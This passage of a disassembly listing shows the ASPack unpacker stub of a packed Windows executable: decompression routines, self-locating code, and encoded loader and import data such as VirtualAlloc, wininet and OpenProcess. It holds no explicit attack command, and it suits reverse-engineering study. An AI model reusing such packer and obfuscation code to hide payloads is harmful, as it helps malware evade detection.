push 4
mov ecx, ebp
call sub_44A65D
mov [esp+esi+31Ch+var_30C], al
inc esi
cmp esi, 13h
jb short loc_44AA48
lea edi, [ebx+1C0h]
lea eax, [esp+31Ch+var_30C]
push eax
mov ecx, edi
call sub_44A6ED
test al, al
jnz short loc_44AA7C
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_44AA7C: ; CODE XREF: sub_44AA1C+53�j
xor esi, esi
loc_44AA7E: ; CODE XREF: sub_44AA1C+E9�j
mov ecx, edi
call sub_44A869
cmp eax, 10h
jnb short loc_44AA9F
mov ecx, [ebx+260h]
mov dl, [ecx+esi]
add dl, al
and dl, 0Fh
mov [esp+esi+31Ch+var_2F8], dl
inc esi
jmp short loc_44AAFF
; ---------------------------------------------------------------------------
loc_44AA9F: ; CODE XREF: sub_44AA1C+6C�j
jnz short loc_44AAC9
push 2
mov ecx, ebp
call sub_44A65D
add eax, 3
test eax, eax
jle short loc_44AAFF
loc_44AAB1: ; CODE XREF: sub_44AA1C+A9�j
cmp esi, 2F5h
jge short loc_44AB0B
mov cl, [esp+esi+31Ch+var_2F9]
dec eax
mov [esp+esi+31Ch+var_2F8], cl
inc esi
test eax, eax
jg short loc_44AAB1
jmp short loc_44AAFF
; ---------------------------------------------------------------------------
loc_44AAC9: ; CODE XREF: sub_44AA1C:loc_44AA9F�j
cmp eax, 11h
jnz short loc_44AADC
push 3
mov ecx, ebp
call sub_44A65D
add eax, 3
jmp short loc_44AAE8
; ---------------------------------------------------------------------------
loc_44AADC: ; CODE XREF: sub_44AA1C+B0�j
push 7
mov ecx, ebp
call sub_44A65D
add eax, 0Bh
loc_44AAE8: ; CODE XREF: sub_44AA1C+BE�j
test eax, eax
jle short loc_44AAFF
loc_44AAEC: ; CODE XREF: sub_44AA1C+E1�j
cmp esi, 2F5h
jge short loc_44AB0B
mov [esp+esi+31Ch+var_2F8], 0
inc esi
dec eax
test eax, eax
jg short loc_44AAEC
loc_44AAFF: ; CODE XREF: sub_44AA1C+81�j
; sub_44AA1C+93�j ...
cmp esi, 2F5h
jl loc_44AA7E
loc_44AB0B: ; CODE XREF: sub_44AA1C+9B�j
; sub_44AA1C+D6�j
lea edx, [esp+31Ch+var_2F8]
lea ecx, [ebx+10h]
push edx
call sub_44A6ED
test al, al
jnz short loc_44AB27
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_44AB27: ; CODE XREF: sub_44AA1C+FE�j
lea eax, [esp+31Ch+var_27]
lea ecx, [ebx+0A0h]
push eax
call sub_44A6ED
test al, al
jnz short loc_44AB49
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_44AB49: ; CODE XREF: sub_44AA1C+120�j
lea ecx, [esp+31Ch+var_B]
push ecx
lea ecx, [ebx+130h]
call sub_44A6ED
test al, al
jnz short loc_44AB6B
pop edi
pop esi
pop ebp
pop ebx
add esp, 30Ch
retn
; ---------------------------------------------------------------------------
loc_44AB6B: ; CODE XREF: sub_44AA1C+142�j
mov byte ptr [ebx+264h], 0
xor eax, eax
loc_44AB74: ; CODE XREF: sub_44AA1C+166�j
cmp [esp+eax+31Ch+var_B], 3
jnz short loc_44AB86
inc eax
cmp eax, 8
jb short loc_44AB74
jmp short loc_44AB8D
; ---------------------------------------------------------------------------
loc_44AB86: ; CODE XREF: sub_44AA1C+160�j
mov byte ptr [ebx+264h], 1
loc_44AB8D: ; CODE XREF: sub_44AA1C+168�j
mov eax, [ebx+260h]
lea ecx, [esp+31Ch+var_2F8]
mov esi, 2F5h
loc_44AB9C: ; CODE XREF: sub_44AA1C+187�j
mov dl, [ecx]
mov [eax], dl
inc eax
inc ecx
dec esi
jnz short loc_44AB9C
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 30Ch
retn
sub_44AA1C endp
; =============== S U B R O U T I N E =======================================
sub_44ABB2 proc near ; CODE XREF: sub_44A93D+12�p
; sub_44ABC0+80�p ...
call sub_44ABB8
nop
sub_44ABB2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44ABB8 proc near ; CODE XREF: sub_44ABB2�p
pop esi
sub esi, 44455Bh
retn
sub_44ABB8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44ABC0 proc near ; CODE XREF: .aspack:0044A5CC�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 14h
mov eax, [esp+14h+arg_4]
push ebx
push ebp
push esi
mov dword ptr [eax], 0
mov eax, [esp+20h+arg_0]
push edi
xor edi, edi
test eax, eax
mov esi, ecx
mov [esp+24h+var_14], edi
jbe loc_44AE40
loc_44ABE5: ; CODE XREF: sub_44ABC0+274�j
lea ecx, [esi+10h]
call sub_44A869
cmp eax, 100h
jnb short loc_44AC07
mov ecx, [esi]
mov [ecx], al
mov ecx, [esi]
inc ecx
inc edi
mov [esi], ecx
mov [esp+24h+var_14], edi
jmp loc_44AE30
; ---------------------------------------------------------------------------
loc_44AC07: ; CODE XREF: sub_44ABC0+32�j
cmp eax, 2D0h
jnb loc_44AE25
add eax, 0FFFFFF00h
mov ebp, eax
and eax, 7
shr ebp, 3
lea edx, [eax+2]
cmp eax, 7
mov [esp+24h+var_10], edx
jnz loc_44ACC3
lea ecx, [esi+0A0h]
call sub_44A869
mov ecx, [esi+8]
xor ebx, ebx
push esi
call sub_44ABB2
mov bl, [eax+esi+443FABh]
pop esi
cmp ecx, 8
jb short loc_44AC84
loc_44AC52: ; CODE XREF: sub_44ABC0+C2�j
mov ecx, [esi+4]
mov dl, [ecx]
inc ecx
mov byte ptr [esp+24h+var_C], dl
mov [esi+4], ecx
mov ecx, [esi+0Ch]
mov edx, [esp+24h+var_C]
shl ecx, 8
and edx, 0FFh
or ecx, edx
mov edx, [esi+8]
add edx, 0FFFFFFF8h
mov [esi+0Ch], ecx
mov ecx, edx
mov [esi+8], edx
cmp ecx, 8
jnb short loc_44AC52
loc_44AC84: ; CODE XREF: sub_44ABC0+90�j
mov edi, [esi+8]
mov edx, [esi+0Ch]
mov ecx, 8
sub ecx, edi
add edi, ebx
shr edx, cl
mov ecx, 18h
mov [esi+8], edi
sub ecx, ebx
and edx, 0FFFFFFh
shr edx, cl
xor ecx, ecx
push esi
call sub_44ABB2
mov cl, [eax+esi+443F8Fh]
pop esi
mov eax, [esp+24h+var_10]
add ecx, edx
add eax, ecx
mov [esp+24h+var_10], eax
loc_44ACC3: ; CODE XREF: sub_44ABC0+69�j
mov al, [esi+264h]
mov ebx, [esi+ebp*4+268h]
xor edx, edx
push esi
call sub_44ABB2
mov dl, [ebp+esi+443FC7h]
pop esi
test al, al
mov edi, edx
jz short loc_44AD5C
cmp edi, 3
jb short loc_44AD5C
mov eax, [esi+8]
lea ebp, [edi-3]
cmp eax, 8
jb short loc_44AD27
loc_44ACF6: ; CODE XREF: sub_44ABC0+165�j
mov eax, [esi+4]
mov edx, [esi+0Ch]
shl edx, 8
mov cl, [eax]
inc eax
mov byte ptr [esp+24h+var_8], cl
mov ecx, [esi+8]
mov [esi+4], eax
mov eax, [esp+24h+var_8]
and eax, 0FFh
add ecx, 0FFFFFFF8h
or edx, eax
mov eax, ecx
cmp eax, 8
mov [esi+0Ch], edx
mov [esi+8], ecx
jnb short loc_44ACF6
loc_44AD27: ; CODE XREF: sub_44ABC0+134�j
mov eax, [esi+8]
mov edi, [esi+0Ch]
mov ecx, 8
sub ecx, eax
add eax, ebp
shr edi, cl
mov ecx, 18h
mov [esi+8], eax
sub ecx, ebp
and edi, 0FFFFFFh
shr edi, cl
lea ecx, [esi+130h]
call sub_44A869
add eax, ebx
lea ebx, [eax+edi*8]
jmp short loc_44ADB7
; ---------------------------------------------------------------------------
loc_44AD5C: ; CODE XREF: sub_44ABC0+124�j
; sub_44ABC0+129�j
cmp dword ptr [esi+8], 8
jb short loc_44AD93
loc_44AD62: ; CODE XREF: sub_44ABC0+1D1�j
mov eax, [esi+4]
mov edx, [esi+0Ch]
shl edx, 8
mov cl, [eax]
inc eax
mov byte ptr [esp+24h+var_4], cl
mov ecx, [esi+8]
mov [esi+4], eax
mov eax, [esp+24h+var_4]
and eax, 0FFh
add ecx, 0FFFFFFF8h
or edx, eax
mov eax, ecx
cmp eax, 8
mov [esi+0Ch], edx
mov [esi+8], ecx
jnb short loc_44AD62
loc_44AD93: ; CODE XREF: sub_44ABC0+1A0�j
mov edx, [esi+8]
mov eax, [esi+0Ch]
mov ecx, 8
sub ecx, edx
add edx, edi
shr eax, cl
mov ecx, 18h
mov [esi+8], edx
sub ecx, edi
and eax, 0FFFFFFh
shr eax, cl
add ebx, eax
loc_44ADB7: ; CODE XREF: sub_44ABC0+19A�j
cmp ebx, 3
jnb short loc_44ADD6
mov ecx, [esi+ebx*4+250h]
test ebx, ebx
jz short loc_44ADF7
mov edx, [esi+250h]
mov [esi+ebx*4+250h], edx
jmp short loc_44ADF1
; ---------------------------------------------------------------------------
loc_44ADD6: ; CODE XREF: sub_44ABC0+1FA�j
mov eax, [esi+254h]
mov edx, [esi+250h]
lea ecx, [ebx-3]
mov [esi+258h], eax
mov [esi+254h], edx
loc_44ADF1: ; CODE XREF: sub_44ABC0+214�j
mov [esi+250h], ecx
loc_44ADF7: ; CODE XREF: sub_44ABC0+205�j
mov eax, [esi]
mov edi, [esp+24h+var_10]
inc ecx
lea edx, [eax+edi]
cmp eax, edx
mov [esi], edx
jnb short loc_44AE17
loc_44AE07: ; CODE XREF: sub_44ABC0+255�j
mov edx, eax
sub edx, ecx
inc eax
mov dl, [edx]
mov [eax-1], dl
mov edx, [esi]
cmp eax, edx
jb short loc_44AE07
loc_44AE17: ; CODE XREF: sub_44ABC0+245�j
mov eax, [esp+24h+var_14]
add eax, edi
mov [esp+24h+var_14], eax
mov edi, eax
jmp short loc_44AE30
; ---------------------------------------------------------------------------
loc_44AE25: ; CODE XREF: sub_44ABC0+4C�j
mov ecx, esi
call sub_44AA1C
test al, al
jz short loc_44AE4C
loc_44AE30: ; CODE XREF: sub_44ABC0+42�j
; sub_44ABC0+263�j
cmp edi, [esp+24h+arg_0]
jb loc_44ABE5
mov eax, [esp+24h+arg_4]
mov [eax], edi
loc_44AE40: ; CODE XREF: sub_44ABC0+1F�j
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 14h
retn 8
; ---------------------------------------------------------------------------
loc_44AE4C: ; CODE XREF: sub_44ABC0+26E�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
add esp, 14h
retn 8
sub_44ABC0 endp
; ---------------------------------------------------------------------------
dd 0
dd 8, 400000h, 7C800000h, 6E72656Bh, 32336C65h, 6C6C642Eh
dd 72695600h, 6C617574h, 6F6C6C41h, 69560063h, 61757472h
dd 6572466Ch, 69560065h, 61757472h, 6F72506Ch, 74636574h
dd 69784500h, 6F725074h, 73736563h, 0
dd 65737500h, 2E323372h, 6C6C64h, 7373654Dh, 42656761h
dd 41786Fh, 72707377h, 66746E69h, 4F4C0041h, 52454441h
dd 52524520h, 5400524Fh, 70206568h, 65636F72h, 65727564h
dd 746E6520h, 70207972h, 746E696Fh, 20732520h, 6C756F63h
dd 6F6E2064h, 65622074h, 636F6C20h, 64657461h, 206E6920h
dd 20656874h, 616E7964h, 2063696Dh, 6B6E696Ch, 62696C20h
dd 79726172h, 732520h, 20656854h, 6964726Fh, 206C616Eh
dd 63207525h, 646C756Fh, 746F6E20h, 20656220h, 61636F6Ch
dd 20646574h, 74206E69h, 64206568h, 6D616E79h, 6C206369h
dd 206B6E69h, 7262696Ch, 20797261h, 90007325h, 7C80ADA0h
dd 7C80B6A1h, 7C801D77h, 0
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 47000000h, 72507465h
dd 6441636Fh, 73657264h, 73h, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 4C000000h, 4C64616Fh, 61726269h, 417972h
dd 3 dup(0)
dd 4AF80h, 4AF70h, 3 dup(0)
dd 4B074h, 4B0C4h, 3 dup(0)
dd 4B081h, 4B0CCh, 3 dup(0)
dd 4B08Dh, 4B0D4h, 3 dup(0)
dd 4B097h, 4B0DCh, 3 dup(0)
dd 4B0A2h, 4B0E4h, 3 dup(0)
dd 4B0ACh, 4B0ECh, 3 dup(0)
dd 4B0B9h, 4B0F4h, 5 dup(0)
dd 61656C6Fh, 32337475h, 6C6C642Eh, 6E697700h, 74656E69h
dd 6C6C642Eh, 656C6F00h, 642E3233h, 75006C6Ch, 33726573h
dd 6C642E32h, 6467006Ch, 2E323369h, 6C6C64h, 61766461h
dd 32336970h, 6C6C642Eh, 74726300h, 2E6C6C64h, 6C6C64h
dd 77124C05h, 0
dd 42C2DE3Dh, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0FAh, 4Fh, 77h
dd 0
dd 7E41F642h, 0
dd 77F161D1h, 0
dd 77DD7753h, 0
; ---------------------------------------------------------------------------
jmp short loc_44B165
; ---------------------------------------------------------------------------
dw 73D9h
dd 0
db 0
align 2
aSysallocstring db 'SysAllocString',0
db 2 dup(0), 46h
aIndfirsturlcac db 'indFirstUrlCacheEntryA',0
align 4
dd 436F4300h, 74616572h, 736E4965h, 636E6174h, 65h, 6C6C6143h
dd 646E6957h, 7250776Fh, 41636Fh, 65470000h, 6F745374h
dd 624F6B63h, 7463656Ah, 4F000000h, 506E6570h
db 72h
; ---------------------------------------------------------------------------
loc_44B165: ; CODE XREF: .aspack:0044B0F4�j
outsd
arpl [ebp+73h], sp
jnb short near ptr byte_44B1BF
outsd
imul esp, [ebp+6Eh], 0
; ---------------------------------------------------------------------------
dd 695F0000h, 616F74h, 11h dup(0)
db 3 dup(0)
byte_44B1BF db 0 ; CODE XREF: .aspack:0044B169�j
align 1000h
_aspack ends
; Section 7. (virtual address 00054000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00054000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 454000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start